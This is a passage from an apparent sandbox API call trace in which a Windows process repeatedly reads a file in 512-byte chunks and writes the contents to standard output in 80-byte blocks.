lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.262] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.262] ReadFile 
(in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.263] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.263] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, 
lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.265] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, 
lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.266] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.266] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0094.266] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] 
GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.267] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.267] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | 
out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, 
lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.268] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.268] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.269] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) 
returned 1 [0094.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.269] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle 
